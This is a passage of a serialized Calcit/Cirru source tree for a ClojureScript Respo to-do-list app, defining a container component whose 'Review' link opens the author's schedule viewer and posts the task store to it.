|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Sye9l59qy0rZ)
|j $ {} (:text |respo-ui.core) (:type :leaf) (:at 1629051583463) (:by |Qr5ffqtY)
|r $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJfce59ck0r-)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkEql9c5k0B-)
|j $ {} (:text |hsl) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJScx5qqJCHW)
:type :expr
:at 1500452996813
:by nil
:id |B1Xcl5q51CSb
:type :expr
:at 1500452996813
:by nil
:id |Bkk5xqqqJRSW
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1D5lc5ckAS-)
|j $ {} (:text |respo-ui.core) (:type :leaf) (:at 1518014658045) (:by |root) (:id |BJd9g5qckRSW)
|r $ {} (:text |:as) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1Fce5c9JRSb)
|v $ {} (:text |ui) (:type :leaf) (:at 1500452996813) (:by |root) (:id |By5qg55qyRrb)
:type :expr
:at 1500452996813
:by nil
:id |ryLqlc95yAHb
|v $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1500454556228) (:by |root) (:id |Hy2tl99qkCr-)
|T $ {} (:text |respo.core) (:type :leaf) (:at 1553789395406) (:by |root) (:id |B1NKl99q1RrW)
|j $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkBKg5551ABb)
|r $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1500454559017) (:by |root) (:id |rJuYgqcqJASW)
|T $ {} (:text |defcomp) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1vKxc5qkABW)
|j $ {} (:text |div) (:type :leaf) (:at 1500454585586) (:by |root) (:id |SkYFlcqqJCHb)
|r $ {} (:text |span) (:type :leaf) (:at 1500454586236) (:by |root) (:id |HycFg5c9JRrb)
|v $ {} (:text |input) (:type :leaf) (:at 1500455242531) (:by |root) (:id |B1sYg559yRrW)
|x $ {} (:text |<>) (:type :leaf) (:at 1518016020262) (:by |root) (:id |By3GU9uLz)
:type :expr
:at 1500452996813
:by nil
:id |ry8Yl5951RBb
:type :expr
:at 1500452996813
:by nil
:id |HygFWHnW0Z
|x $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1Qil959J0SZ)
|j $ {} (:text |respo.comp.space) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkNie9cc1ABW)
|r $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryBjg5qckCHb)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByPilq95JRHW)
|j $ {} (:text |=<) (:type :leaf) (:at 1508038810729) (:by |root) (:id |Hyuog9c9k0HW)
:type :expr
:at 1500452996813
:by nil
:id |HJ8ixqc91CHW
:type :expr
:at 1500452996813
:by nil
:id |BJGil995kCBb
|yv $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686519855)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686521895) (:text |app.config)
|j $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686522828) (:text |:refer)
|r $ {} (:type :expr) (:by |Qr5ffqtY) (:at 1638686523112)
:data $ {}
|T $ {} (:type :leaf) (:by |Qr5ffqtY) (:at 1638686525622) (:text |demo?)
:type :expr
:at 1500452996813
:by nil
:id |HJTFl9ccJ0BZ
:type :expr
:at 1500452996813
:by nil
:id |S1Rux9cc1CHZ
|app.comp.container $ {}
:defs $ {}
|comp-container $ {}
:data $ {}
|T $ {} (:text |defcomp) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1CjQ5c91AHW)
|j $ {} (:text |comp-container) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1k2Qq55JRHb)
|r $ {}
:data $ {}
|T $ {} (:text |reel) (:type :leaf) (:at 1553790232228) (:by |root) (:id |SJ-2Qqc9JCrW)
:type :expr
:at 1500452996813
:by nil
:id |Bkg3QccqkCH-
|v $ {}
:data $ {}
|D $ {} (:text |let) (:type :leaf) (:at 1553790221906) (:by |root) (:id |ED4SIHk_j)
|L $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |store) (:type :leaf) (:at 1553790223373) (:by |root) (:id |jN6IlrRjf4)
|j $ {}
:data $ {}
|T $ {} (:text |:store) (:type :leaf) (:at 1553790224152) (:by |root) (:id |LRu5nwkPQs)
|j $ {} (:text |reel) (:type :leaf) (:at 1553790229544) (:by |root) (:id |9bZ6kv25LB)
:type :expr
:at 1553790224586
:by |root
:id |9enXkEsZe
:type :expr
:at 1553790222612
:by |root
:id |PCV9KtqS-
:type :expr
:at 1553790222397
:by |root
:id |oEzauR526y
|T $ {}
:data $ {}
|xT $ {}
:data $ {}
|T $ {} (:text |comp-transparent) (:type :leaf) (:at 1525625885339) (:by |root) (:id |SJbRJrWXuf)
:type :expr
:at 1525625883663
:by |root
:id |BJ47E3npz
|T $ {} (:text |div) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkXhXq5910rW)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SySnX99qJ0S-)
|j $ {}
:data $ {}
|T $ {} (:text |:style) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Skwh7cqcJ0BW)
|j $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1Yn75c9J0Bb)
|j $ {} (:text |ui/global) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hkc2mqcq10Bb)
|r $ {} (:text |ui/fullscreen) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1ohm9q9J0rZ)
|v $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJlyEqc5y0Hb)
|j $ {}
:data $ {}
|T $ {} (:text |:background-position) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Skzy4c5c1CHW)
|j $ {} (:text "||left top") (:type :leaf) (:at 1500452996813) (:by |root) (:id |rk7kN9q5yRSZ)
:type :expr
:at 1500452996813
:by nil
:id |HkZ14c99kASb
|r $ {}
:data $ {}
|T $ {} (:text |:color) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1r1Eq5q1CH-)
|j $ {} (:text |:white) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SkLJN5c5yASZ)
:type :expr
:at 1500452996813
:by nil
:id |rkVkE9q9yASb
|v $ {}
:data $ {}
|T $ {} (:text |:overflow) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1u1V559kRr-)
|j $ {} (:text |:auto) (:type :leaf) (:at 1518022143160) (:by |root) (:id |ByFyN99qk0Sb)
:type :expr
:at 1500452996813
:by nil
:id |rJPyN9q5kArb
|x $ {}
:data $ {}
|T $ {} (:text |:padding) (:type :leaf) (:at 1518022227607) (:by |root) (:id |By5UAj_8zleaf)
|j $ {} (:text "||160px 200px") (:type :leaf) (:at 1518022694025) (:by |root) (:id |r1xnIRiOUG)
:type :expr
:at 1518022225758
:by |root
:id |By5UAj_8z
:type :expr
:at 1500452996813
:by nil
:id |H1xcWAoOIM
:type :expr
:at 1500452996813
:by nil
:id |SJ_nm955J0rZ
:type :expr
:at 1500452996813
:by nil
:id |HJUnQcq9kCBZ
:type :expr
:at 1500452996813
:by nil
:id |r143Q5c5kCrZ
|r $ {}
:data $ {}
|T $ {} (:text |comp-todolist) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryRn7555kCHW)
|j $ {}
:data $ {}
|T $ {} (:text |:tasks) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJxTm99qJAB-)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByZpX5cqkAHZ)
:type :expr
:at 1500452996813
:by nil
:id |rJk6Q9591CBZ
|r $ {}
:data $ {}
|T $ {} (:text |:pointer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkmTX5q5JRBW)
|j $ {} (:text |store) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ry4TQ995J0r-)
:type :expr
:at 1500452996813
:by nil
:id |Byfp7q95JCrb
|v $ {}
:data $ {}
|T $ {} (:text |:dragging-id) (:type :leaf) (:at 1518169599432) (:by |root) (:id |Skx4ZC1o8Mleaf)
|j $ {} (:text |store) (:type :leaf) (:at 1518169600590) (:by |root) (:id |SkfvZCyoIM)
:type :expr
:at 1518169595891
:by |root
:id |Skx4ZC1o8M
|x $ {}
:data $ {}
|T $ {} (:text |:dropping-id) (:type :leaf) (:at 1519749560154) (:by |root) (:id |Skx4ZC1o8Mleaf)
|j $ {} (:text |store) (:type :leaf) (:at 1518169600590) (:by |root) (:id |SkfvZCyoIM)
:type :expr
:at 1518169595891
:by |root
:id |SkkpKW7df
:type :expr
:at 1500452996813
:by nil
:id |SyT3Q99qyABb
|x $ {}
:data $ {}
|D $ {} (:text |div) (:type :leaf) (:at 1525626577528) (:by |root) (:id |rJZtCI2n6G)
|L $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1525626578579) (:by |root) (:id |ryxcCL2haf)
|j $ {}
:data $ {}
|T $ {} (:text |:style) (:type :leaf) (:at 1525626581968) (:by |root) (:id |By2C82haG)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1525626582510) (:by |root) (:id |B1E00U33az)
|j $ {}
:data $ {}
|T $ {} (:text |:position) (:type :leaf) (:at 1525626629423) (:by |root) (:id |B19Wvn2Tz)
|j $ {} (:text |:fixed) (:type :leaf) (:at 1525626631133) (:by |root) (:id |H1CWvn36M)
:type :expr
:at 1525626626404
:by |root
:id |r1xc-D2hpM
|r $ {}
:data $ {}
|T $ {} (:text |:bottom) (:type :leaf) (:at 1525626633112) (:by |root) (:id |Sk-lGw33TGleaf)
|j $ {} (:text |0) (:type :leaf) (:at 1525626634072) (:by |root) (:id |SkHWfwn3pM)
:type :expr
:at 1525626632221
:by |root
:id |Sk-lGw33TG
|v $ {}
:data $ {}
|T $ {} (:text |:left) (:type :leaf) (:at 1525626639856) (:by |root) (:id |H1gNzDhhpfleaf)
|j $ {} (:text |16) (:type :leaf) (:at 1525626887670) (:by |root) (:id |Bk7OfD32TM)
:type :expr
:at 1525626636483
:by |root
:id |H1gNzDhhpf
:type :expr
:at 1525626582177
:by |root
:id |SkBRCIn2pz
:type :expr
:at 1525626580551
:by |root
:id |BJaRIhnpz
:type :expr
:at 1525626577710
:by |root
:id |HJWcAU32TM
|T $ {}
:data $ {}
|T $ {} (:text |a) (:type :leaf) (:at 1525626834564) (:by |root) (:id |B1fFDA26Zleaf)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1508857725923) (:by |root) (:id |ByZHKDR2aW)
|j $ {}
:data $ {}
|T $ {} (:text |:inner-text) (:type :leaf) (:at 1508857728283) (:by |root) (:id |SyWUYwA2aW)
|j $ {} (:text ||Relax) (:type :leaf) (:at 1527734625509) (:by |root) (:id |ByNdKPAnaZ)
:type :expr
:at 1508857726249
:by |root
:id |HJG8tPC3TW
|r $ {}
:data $ {}
|T $ {} (:text |:style) (:type :leaf) (:at 1508857749023) (:by |root) (:id |H1eocv0naZleaf)
|j $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1508857750699) (:by |root) (:id |Bk7aqD03pZ)
|n $ {} (:text |style/link) (:type :leaf) (:at 1525626859493) (:by |root) (:id |BkgxNiv2npz)
:type :expr
:at 1508857750058
:by |root
:id |HJAcvCnpW
:type :expr
:at 1508857747506
:by |root
:id |H1eocv0naZ
|v $ {}
:data $ {}
|T $ {} (:text |:on-click) (:type :leaf) (:at 1514170045981) (:by |root) (:id |SJblpP0hp-)
|j $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1629051748469) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1629051749406) (:by |Qr5ffqtY)
|j $ {} (:text |d!) (:type :leaf) (:at 1629051750083) (:by |Qr5ffqtY)
:type :expr
:at 1629051748826
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |d!) (:type :leaf) (:at 1629051747281) (:by |Qr5ffqtY) (:id |r1goavC36bleaf)
|j $ {} (:text |:task/relax) (:type :leaf) (:at 1527734621999) (:by |root) (:id |Byl26wR3a-)
|r $ {} (:text |nil) (:type :leaf) (:at 1508857806816) (:by |root) (:id |S18RwA2pb)
:type :expr
:at 1508857794826
:by |root
:id |HkRZ8h36G
:type :expr
:at 1629051747860
:by |Qr5ffqtY
:type :expr
:at 1508857783984
:by |root
:id |BJgQp8JRGM
:type :expr
:at 1508857725461
:by |root
:id |SkfBKDA26-
:type :expr
:at 1508857721923
:by |root
:id |B1fFDA26Z
|j $ {}
:data $ {}
|T $ {} (:text |=<) (:type :leaf) (:at 1525626644681) (:by |root) (:id |BJg2fDh36Mleaf)
|j $ {} (:text |8) (:type :leaf) (:at 1525626645454) (:by |root) (:id |HyZazwh2az)
|r $ {} (:text |nil) (:type :leaf) (:at 1525626645919) (:by |root) (:id |HJ0Mwhh6f)
:type :expr
:at 1525626644234
:by |root
:id |BJg2fDh36M
|r $ {}
:data $ {}
|T $ {} (:text |a) (:type :leaf) (:at 1525626844862) (:by |root) (:id |B1fFDA26Zleaf)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1508857725923) (:by |root) (:id |ByZHKDR2aW)
|j $ {}
:data $ {}
|T $ {} (:text |:inner-text) (:type :leaf) (:at 1508857728283) (:by |root) (:id |SyWUYwA2aW)
|j $ {} (:text ||Review) (:type :leaf) (:at 1525626892923) (:by |root) (:id |ByNdKPAnaZ)
:type :expr
:at 1508857726249
:by |root
:id |HJG8tPC3TW
|r $ {}
:data $ {}
|T $ {} (:text |:style) (:type :leaf) (:at 1508857749023) (:by |root) (:id |H1eocv0naZleaf)
|j $ {}
:data $ {}
|T $ {} (:text |merge) (:type :leaf) (:at 1508857750699) (:by |root) (:id |Bk7aqD03pZ)
|j $ {} (:text |style/link) (:type :leaf) (:at 1525626857806) (:by |root) (:id |rkZkiDRnTb)
:type :expr
:at 1508857750058
:by |root
:id |HJAcvCnpW
:type :expr
:at 1508857747506
:by |root
:id |H1eocv0naZ
|v $ {}
:data $ {}
|T $ {} (:text |:on-click) (:type :leaf) (:at 1514170045981) (:by |root) (:id |SJblpP0hp-)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1525626663420) (:by |root) (:id |r1bRXD22pG)
|j $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1525626663959) (:by |root) (:id |ryxEP3naf)
|j $ {} (:text |d!) (:type :leaf) (:at 1525626664643) (:by |root) (:id |BkGxVP3nTM)
:type :expr
:at 1525626663717
:by |root
:id |H1elVv22pf
|r $ {}
:data $ {}
|D $ {} (:text |let) (:type :leaf) (:at 1525626901360) (:by |root) (:id |BJ3Gd336z)
|L $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |w) (:type :leaf) (:at 1525626902983) (:by |root) (:id |Bk76f_n2pf)
|j $ {}
:data $ {}
|T $ {} (:text |js/window.open) (:type :leaf) (:at 1629051756900) (:by |Qr5ffqtY) (:id |S1eyXuhnpG)
|j $ {}
:data $ {}
|D $ {} (:text |if) (:type :leaf) (:at 1528871382966) (:by |root) (:id |B1kyq4Cgm)
|L $ {} (:text |config/dev?) (:type :leaf) (:at 1528871386363) (:by |root) (:id |r1ey9ERe7)
|P $ {} (:text "|\"http://localhost:7001") (:type :leaf) (:at 1528871391467) (:by |root) (:id |HygPJcVCgX)
|T $ {} (:text "|\"http://r.tiye.me/Memkits/pudica-schedule-viewer/") (:type :leaf) (:at 1629053151211) (:by |Qr5ffqtY) (:id |rk-Jb840e7)
:type :expr
:at 1528871381179
:by |root
:id |SygpAtNRxQ
:type :expr
:at 1525626903267
:by |root
:id |HJlpJ9EAg7
:type :expr
:at 1525626901684
:by |root
:id |BylCfO33pf
:type :expr
:at 1525626901554
:by |root
:id |rJAMO33pM
|P $ {}
:data $ {}
|D $ {} (:text |js/setTimeout) (:type :leaf) (:at 1528870412050) (:by |root) (:id |ByW1fI40lm)
|T $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1528870415887) (:by |root) (:id |r1_zLECe7)
|L $ {}
:data $ {}
:type :expr
:at 1528870416146
:by |root
:id |BJQ_fINCeX
|j $ {}
:data $ {}
|T $ {} (:text |.postMessage) (:type :leaf) (:at 1528870428971) (:by |root) (:id |rkW7I4Cl7leaf)
|j $ {} (:text |w) (:type :leaf) (:at 1528870429803) (:by |root) (:id |Hk7BmLEAxX)
|r $ {}
:data $ {}
|T $ {} (:text |pr-str) (:type :leaf) (:at 1528870434695) (:by |root) (:id |B1YXL4Rgm)
|j $ {} (:text |store) (:type :leaf) (:at 1528870435896) (:by |root) (:id |HkbsmUN0gX)
:type :expr
:at 1528870432746
:by |root
:id |SygKQ8EAgX
|v $ {} (:text "|\"*") (:type :leaf) (:at 1528870862979) (:by |root) (:id |BJ2ZDV0lQ)
:type :expr
:at 1528870425008
:by |root
:id |rkW7I4Cl7
:type :expr
:at 1528870415209
:by |root
:id |SJZwzIEAxm
|j $ {} (:text |800) (:type :leaf) (:at 1528871359132) (:by |root) (:id |B1cGLNAeQ)
:type :expr
:at 1528870406896
:by |root
:id |BJgyML4ClQ
:type :expr
:at 1525626899307
:by |root
:id |BJiMd33af
:type :expr
:at 1525626662424
:by |root
:id |B1zCQDn3aG
:type :expr
:at 1508857783984
:by |root
:id |BJgQp8JRGM
:type :expr
:at 1508857725461
:by |root
:id |SkfBKDA26-
:type :expr
:at 1508857721923
:by |root
:id |rkblmwn3TG
:type :expr
:at 1525626576832
:by |root
:id |rJxFCL3hpG
|y $ {}
:data $ {}
|D $ {} (:text |when) (:type :leaf) (:at 1525625866351) (:by |root) (:id |BJMfN2haz)
|L $ {} (:text |config/dev?) (:type :leaf) (:at 1574870876165) (:by |Qr5ffqtY) (:id |Sy7f4hnaf)
|T $ {}
:data $ {}
|T $ {} (:text |comp-inspect) (:type :leaf) (:at 1518018968061) (:by |root) (:id |S10q-iuLMleaf)
|j $ {} (:text "|\"Store") (:type :leaf) (:at 1553790252629) (:by |root) (:id |Bk7esWid8M)
|p $ {} (:text |store) (:type :leaf) (:at 1519746710559) (:by |root) (:id |r1xA90lmdM)
|v $ {} (:text |nil) (:type :leaf) (:at 1518018979985) (:by |root) (:id |S1lsoWo_IG)
:type :expr
:at 1518018965645
:by |root
:id |S10q-iuLM
:type :expr
:at 1525625865516
:by |root
:id |HkfbfNnnaz
:type :expr
:at 1500452996813
:by nil
:id |SJG3m59510BZ
:type :expr
:at 1553790219433
:by |root
:id |bGfCLi4bjv
:type :expr
:at 1500452996813
:by nil
:id |HyTjXc55JArW
|on-clear $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BkNWEc991CSb)
|j $ {} (:text |on-clear) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rySWEc5c1RHW)
|r $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HkPbEqc9kCBW)
|j $ {} (:text |dispatch!) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJu-V9qqJCHW)
:type :expr
:at 1500452996813
:by nil
:id |H1LZVc9qyABZ
|v $ {}
:data $ {}
|T $ {} (:text |dispatch!) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B19bVc99JRSZ)
|j $ {} (:text |:task/clear) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJoZNcc5JRB-)
|r $ {} (:text |nil) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H12ZEcq9yCHW)
:type :expr
:at 1500452996813
:by nil
:id |BkFZEc551RBb
:type :expr
:at 1500452996813
:by nil
:id |ry7-E99ckRrW
|comp-transparent $ {}
:data $ {}
|T $ {} (:text |defcomp) (:type :leaf) (:at 1525625881681) (:by |root) (:id |BJZMeHb7dM)
|j $ {} (:text |comp-transparent) (:type :leaf) (:at 1519748330160) (:by |root) (:id |r1ffgHWQdz)
|n $ {}
:data $ {}
:type :expr
:at 1525625871652
:by |root
:id |ByOMV32pf
|r $ {}
:data $ {}
|T $ {} (:text |span) (:type :leaf) (:at 1519748100466) (:by |root) (:id |rygiW4-QuMleaf)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1519748101641) (:by |root) (:id |rJa-4bQdz)
|j $ {}
:data $ {}
|T $ {} (:text |:class-name) (:type :leaf) (:at 1519748103509) (:by |root) (:id |Bk-0ZEZmOM)
|j $ {} (:text ||transparent) (:type :leaf) (:at 1519748112228) (:by |root) (:id |SylzE-m_M)
:type :expr
:at 1519748101845
:by |root
:id |SyfAZ4-Q_M
|r $ {}
:data $ {}
|T $ {} (:text |:style) (:type :leaf) (:at 1519748289118) (:by |root) (:id |ByxuTVWm_zleaf)
|j $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1519748289635) (:by |root) (:id |SJNKpVWm_M)
|j $ {}
:data $ {}
|T $ {} (:text |:width) (:type :leaf) (:at 1519748292353) (:by |root) (:id |BkZqTV-7uz)
|j $ {} (:text |1) (:type :leaf) (:at 1519748292976) (:by |root) (:id |BJapVWQdM)
:type :expr
:at 1519748290444
:by |root
:id |H1Nqp4WXdM
|r $ {}
:data $ {}
|T $ {} (:text |:height) (:type :leaf) (:at 1519748294311) (:by |root) (:id |HJf66NW7ufleaf)
|j $ {} (:text |1) (:type :leaf) (:at 1519748294608) (:by |root) (:id |ByHCaVbmdG)
:type :expr
:at 1519748293291
:by |root
:id |HJf66NW7uf
|v $ {}
:data $ {}
|T $ {} (:text |:background-color) (:type :leaf) (:at 1519748306984) (:by |root) (:id |SklUCNW7Ozleaf)
|j $ {} (:text ||red) (:type :leaf) (:at 1519748309884) (:by |root) (:id |rJNiRVZm_M)
:type :expr
:at 1519748302119
:by |root
:id |SklUCNW7Oz
|x $ {}
:data $ {}
|T $ {} (:text |:display) (:type :leaf) (:at 1519748312451) (:by |root) (:id |S1ZARVbmuMleaf)
|j $ {} (:text |:inline-block) (:type :leaf) (:at 1519748316564) (:by |root) (:id |Hk-kS-Quf)
:type :expr
:at 1519748310336
:by |root
:id |S1ZARVbmuM
:type :expr
:at 1519748289353
:by |root
:id |H1SFpNZXuM
:type :expr
:at 1519748287927
:by |root
:id |ByxuTVWm_z
:type :expr
:at 1519748101249
:by |root
:id |r1WT-EZ7Oz
:type :expr
:at 1519748099447
:by |root
:id |SklNgH-Qdf
:type :expr
:at 1519748330160
:by |root
:id |HyeGlS-muz
:proc $ {}
:data $ {}
:type :expr
:at 1500452996813
:by nil
:id |r13im59c1RBZ
:ns $ {}
:data $ {}
|T $ {} (:text |ns) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJ5dQ595yRSb)
|j $ {} (:text |app.comp.container) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Bki_X99qyRBW)
|v $ {}
:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJ8s7cqc10B-)
|j $ {} (:text |app.comp.todolist) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ryPsm9q9y0Hb)
|r $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hkds75q5yArW)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1qsmc5qJRBZ)
|j $ {} (:text |comp-todolist) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJioQq9ckCBZ)
:type :expr
:at 1500452996813
:by nil
:id |H1ti79c5kArb
:type :expr
:at 1500452996813
:by nil
:id |BJrjQ559kCSb
|yj $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518018999994) (:by |root) (:id |SJx6bsdUMleaf)
|j $ {} (:text |respo.comp.inspect) (:type :leaf) (:at 1518019005934) (:by |root) (:id |ryze6-oOUf)
|r $ {} (:text |:refer) (:type :leaf) (:at 1518019006741) (:by |root) (:id |SJZ86ZsdIf)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1518019007153) (:by |root) (:id |HyMPp-sOIz)
|j $ {} (:text |comp-inspect) (:type :leaf) (:at 1518019010155) (:by |root) (:id |S1IDTbiO8f)
:type :expr
:at 1518019006991
:by |root
:id |H1XDTbs_8G
:type :expr
:at 1518018999691
:by |root
:id |SJx6bsdUM
|yv $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1525626839201) (:by |root) (:id |rkgy1O32pGleaf)
|j $ {} (:text |app.style) (:type :leaf) (:at 1525626840365) (:by |root) (:id |ryXykdh36z)
|r $ {} (:text |:as) (:type :leaf) (:at 1525626840954) (:by |root) (:id |B1IlJdhnTf)
|v $ {} (:text |style) (:type :leaf) (:at 1525626841700) (:by |root) (:id |rkGZy_nhaf)
:type :expr
:at 1525626838911
:by |root
:id |rkgy1O32pG
|yx $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1528871402228) (:by |root) (:id |HklMg9ERe7leaf)
|j $ {} (:text |app.config) (:type :leaf) (:at 1528871403449) (:by |root) (:id |SkmGl94Cgm)
|r $ {} (:text |:as) (:type :leaf) (:at 1528871473957) (:by |root) (:id |SkNlq4Cg7)
|v $ {} (:text |config) (:type :leaf) (:at 1528871405519) (:by |root) (:id |B1XHe940em)
:type :expr
:at 1528871401920
:by |root
:id |HklMg9ERe7
|T $ {} (:text |:require) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r1qKm9c5JAH-)
|j $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJhtQ59qk0HZ)
|j $ {} (:text |hsl.core) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByTK755c1CrZ)
|r $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyAK759q10S-)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJg9Qc9qyCrb)
|j $ {} (:text |hsl) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1-cmq9cyCrZ)
:type :expr
:at 1500452996813
:by nil
:id |rkkqm9c91AHW
:type :expr
:at 1500452996813
:by nil
:id |ryjKm959kRrW
|r $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJXcXqcqkABW)
|j $ {} (:text |respo-ui.core) (:type :leaf) (:at 1518014652028) (:by |root) (:id |HJE57q59k0Bb)
|r $ {} (:text |:as) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1rcXqcc10BW)
|v $ {} (:text |ui) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hk8c7q95y0SZ)
:type :expr
:at 1500452996813
:by nil
:id |ryfcXccc1RSb
|v $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1500454513436) (:by |root) (:id |SkuYQq55kCrZ)
|T $ {} (:text |respo.core) (:type :leaf) (:at 1553789391022) (:by |root) (:id |Sk1Ymc55kRrZ)
|j $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hkgt7q5qy0Sb)
|r $ {}
:data $ {}
|D $ {} (:text |[]) (:type :leaf) (:at 1500454516414) (:by |root) (:id |Hy7YQ5q9kRHW)
|T $ {} (:text |defcomp) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ByGFX959JRr-)
|X $ {} (:text |action->) (:type :leaf) (:at 1525626361581) (:by |root) (:id |S1xlbI22af)
|b $ {} (:text |<>) (:type :leaf) (:at 1500454524965) (:by |root) (:id |BJvFXc55k0HZ)
|j $ {} (:text |div) (:type :leaf) (:at 1500454520939) (:by |root) (:id |H1VY79cqJ0B-)
|r $ {} (:text |span) (:type :leaf) (:at 1500454521496) (:by |root) (:id |rkBtXccckRS-)
|v $ {} (:text |button) (:type :leaf) (:at 1500454522392) (:by |root) (:id |S1LFQ595yASZ)
|x $ {} (:text |a) (:type :leaf) (:at 1525626836783) (:by |root) (:id |rJeTCD2npM)
:type :expr
:at 1500452996813
:by nil
:id |r1WK7qc9k0rW
:type :expr
:at 1500452996813
:by nil
:id |BJlpgB2-C-
|x $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJ1oXcc9JCrW)
|j $ {} (:text |respo.comp.space) (:type :leaf) (:at 1500452996813) (:by |root) (:id |Hkgim559yRr-)
|r $ {} (:text |:refer) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJ-i7c5ckCH-)
|v $ {}
:data $ {}
|T $ {} (:text |[]) (:type :leaf) (:at 1500452996813) (:by |root) (:id |r17o7qqckRHZ)
|j $ {} (:text |=<) (:type :leaf) (:at 1500454541733) (:by |root) (:id |HJNjm559kRB-)
:type :expr
:at 1500452996813
:by nil
:id |Hyzim995JCHZ
:type :expr
:at 1500452996813
:by nil
:id |HJR5mcq9J0S-
:type :expr
:at 1500452996813
:by nil
:id |SJtF7595J0rZ
:type :expr
:at 1500452996813
:by nil
:id |HkFuQc591RSb
|app.schema $ {}
:defs $ {}
|task $ {}
:data $ {}
